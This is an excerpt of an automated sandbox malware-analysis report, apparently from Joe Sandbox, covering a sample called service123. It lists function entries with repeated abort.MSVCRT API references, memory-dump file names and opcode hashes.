abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: fbaa12c6a681875bcbf0c275f74c4c649e957e39642263b4b0ab09efc8d6e07a
Instruction ID: a15a728e173d0bf0a971bb8fac25c72341d630197b6550e1dea85d5c4fce1552
Opcode Fuzzy Hash: fbaa12c6a681875bcbf0c275f74c4c649e957e39642263b4b0ab09efc8d6e07a
Instruction Fuzzy Hash: AD11D372602211CBE308EF28D591F55B7B0FB11309F049B48D594C7A11D739E89DCB90

Function 6CA229F0 Relevance: 42.1, APIs: 28, Instructions: 78COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAF6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 4ed5e2ab570e51426cbe6c4daaf4edc7709df118b0a407dac040808e18cd711f
Instruction ID: b1ae6e474c7d4e98c6fcdea03a36a4008f2d11039125dbd9d1c32fba1c0c9ce2
Opcode Fuzzy Hash: 4ed5e2ab570e51426cbe6c4daaf4edc7709df118b0a407dac040808e18cd711f
Instruction Fuzzy Hash: B60128B2601211CFE708EF28D5A5B65B7B0FB11309F049B48D594CBB11D739E89DCB90

Function 6CA228BB Relevance: 42.1, APIs: 28, Instructions: 73COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAF6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 07cab84cf69398b10d9f1dc8df9f1f5269a3b395b05f75784ff579972190bc99
Instruction ID: bd694bf3f044c069e84f583b54865cd0d5b460f0edcbf228d191ae7dd7a1ae4b
Opcode Fuzzy Hash: 07cab84cf69398b10d9f1dc8df9f1f5269a3b395b05f75784ff579972190bc99
Instruction Fuzzy Hash: 82016971902211CBE308EF19D5A1B66B7B0FB11308F049A48D595CBB01C739E89DCF90

Function 6CA22A6E Relevance: 42.1, APIs: 28, Instructions: 71COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAF6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6e610056cacd09f2d9ad881073b3e590a570c62dba3261491425abf50cba7373
Instruction ID: 3a6cbabc5eb507c14c2825df3b45a92f69a4e5583170d9c2cc6637e2164642a7
Opcode Fuzzy Hash: 6e610056cacd09f2d9ad881073b3e590a570c62dba3261491425abf50cba7373
Instruction Fuzzy Hash: 960137B1901211CBE708EF29D5A5B6AB7B0FF12308F049A48D594DBB05C739E89DCB90

Function 6CA22B13 Relevance: 42.1, APIs: 28, Instructions: 69COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAF6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: fd464ed205fcecbb46de9cfe303d4d2002258ce0af422949a150b9f08e632795
Instruction ID: dc5fc57cbbc1e9f307476986a6a7aa5e9106bcf13575a3e88ad479ba109914c0
Opcode Fuzzy Hash: fd464ed205fcecbb46de9cfe303d4d2002258ce0af422949a150b9f08e632795
Instruction Fuzzy Hash: 51F06DB1905211CBD704EF28D5E4B66B7B1FF12308F049A48D4949BB06C739E4ADCF90

Function 6CA229B1 Relevance: 42.1, APIs: 28, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAF6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: caea78b89106653d114ffeaed3a3d17c9b81092d105a902e3a7287f3c554d5a7
Instruction ID: 8fbf1640473fe0c6515e3a526e3bbc4ce3cde7a53ce1d0b22b7fb6437ffa56ab
Opcode Fuzzy Hash: caea78b89106653d114ffeaed3a3d17c9b81092d105a902e3a7287f3c554d5a7
Instruction Fuzzy Hash: F2F090B1901211CBD704EF28D1E4B66B770FF02308F049A48D4549BB06D739E49ECF80

Function 6CA22AAD Relevance: 42.1, APIs: 28, Instructions: 65COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAF6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 4745bfb8e163a2e76a714115fd548839a3770c52929cf19a77cb37e4562bbd54
